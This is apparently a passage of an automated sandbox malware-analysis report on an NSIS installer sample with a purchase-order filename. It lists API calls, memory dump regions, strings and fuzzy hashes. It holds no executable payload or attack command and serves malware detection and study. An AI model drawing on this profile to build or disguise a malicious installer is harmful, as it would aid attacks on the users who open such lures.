                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00441800,00441800,0043F000,0040336A,00441800,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                • CharNextW.USER32(?,00000000,00441800,00441800,0043F000,0040336A,00441800,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                • CharPrevW.USER32(?,?,00441800,00441800,0043F000,0040336A,00441800,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":
                                                • API String ID: 589700163-165019052
                                                • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,0040A5D0,00440000,?,?,00000031), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5D0,0040A5D0,00000000,00000000,0040A5D0,00440000,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                  • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,?,74DF23A0), ref: 0040537D
                                                  • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID:
                                                • API String ID: 1941528284-0
                                                • Opcode ID: 6e9a8046af19eb094d6abfdf57eef79a3d41af2fa463d12146f877a34a213090
                                                • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                • Opcode Fuzzy Hash: 6e9a8046af19eb094d6abfdf57eef79a3d41af2fa463d12146f877a34a213090
                                                • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D
                                                APIs
                                                • GetDC.USER32(?), ref: 00401DBC
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: 0df72e3b5cf70d21c530e24e682e28afae01b7faaf581061804cefe84a28b9e7
                                                • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                • Opcode Fuzzy Hash: 0df72e3b5cf70d21c530e24e682e28afae01b7faaf581061804cefe84a28b9e7
                                                • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
                                                • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                • Opcode Fuzzy Hash: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
                                                • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                APIs
                                                • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                • wsprintfW.USER32 ref: 00404B88
                                                • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: be899ce802f4ada5aa38b77195d66e19eeaafb4e1a6305ece11e6f52dcfdaeb3
                                                • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                • Opcode Fuzzy Hash: be899ce802f4ada5aa38b77195d66e19eeaafb4e1a6305ece11e6f52dcfdaeb3
                                                • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                APIs
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Close$Enum
                                                • String ID:
                                                • API String ID: 464197530-0
                                                • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                APIs
                                                • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834
                                                • GetLastError.KERNEL32 ref: 00405848
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                • GetLastError.KERNEL32 ref: 00405867
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID:
                                                • API String ID: 3449924974-0
                                                • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9
                                                APIs
                                                • DestroyWindow.USER32(?,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                • GetTickCount.KERNEL32 ref: 00402EAA
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 004052C5
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                  • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405DFD
                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,0043F000,0040338D,00441000,00441800,00441800,00441800,00441800,00441800,74DF3420,004035D9), ref: 00405E18
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: nsa
                                                • API String ID: 1716503409-2209301699
                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q
                                                • API String ID: 0-2125118731
                                                • Opcode ID: 35f4664fa8c491bfbebcc39116843a16292e8eba374d070443f8403d3b94f252
                                                • Instruction ID: 7bb823d0b145e2217785a41c7e02fad70b1e8ba56fdec6584161be059e64588d
                                                • Opcode Fuzzy Hash: 35f4664fa8c491bfbebcc39116843a16292e8eba374d070443f8403d3b94f252
                                                • Instruction Fuzzy Hash: 2DB16034E10209CFEB14DF6AC59469EB7B2FF84344F218829D805AB365DBB5DC86CB91
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                • CloseHandle.KERNEL32(?), ref: 004058D9
                                                Strings
                                                • Error launching installer, xrefs: 004058B6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$$^q$$^q
                                                • API String ID: 0-2454687669
                                                • Opcode ID: 081a75071683870cb6c99382f5f4f3caeb1e9b32e983ff4a8ee34f5e2f005649
                                                • Instruction ID: 3b89b80a6ccb915c5d5b45d28722881b20758a2af9051382b5dd2a0beb81a7ee
                                                • Opcode Fuzzy Hash: 081a75071683870cb6c99382f5f4f3caeb1e9b32e983ff4a8ee34f5e2f005649
                                                • Instruction Fuzzy Hash: 4F51A430B102058FEB08DF29C554A6AB7F2FB88348F118569EC05AB395DB74DC85CBA6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q
                                                • API String ID: 0-2125118731
                                                • Opcode ID: c8f6301b85ced8e78569aa6ddb3e388e5f09373b0e93429b0b41f19b0a32df88
                                                • Instruction ID: e1822fc6d77f91274887aef1441a214c2b6ab2ee68fd1eb773b823fcb76d2f9c
                                                • Opcode Fuzzy Hash: c8f6301b85ced8e78569aa6ddb3e388e5f09373b0e93429b0b41f19b0a32df88
                                                • Instruction Fuzzy Hash: A651F174F102058FEB15DA6AC48069DB7B2EB84349F238829DC05EB355DBB1DC86CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q
                                                • API String ID: 0-2125118731
                                                • Opcode ID: b42d712026e545ba4785c6a2521b4848de8b28514a16bb843f6ea066422a2f4b
                                                • Instruction ID: be1f6c62473ebb660a54671238ac51753ff45fe82a6a6f16b1e8a01436eab77e
                                                • Opcode Fuzzy Hash: b42d712026e545ba4785c6a2521b4848de8b28514a16bb843f6ea066422a2f4b
                                                • Instruction Fuzzy Hash: 5241C034B10306CFEB16DB66C58065DB7B2EF84358F228529DC05AB355DBB1DC86CB91
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98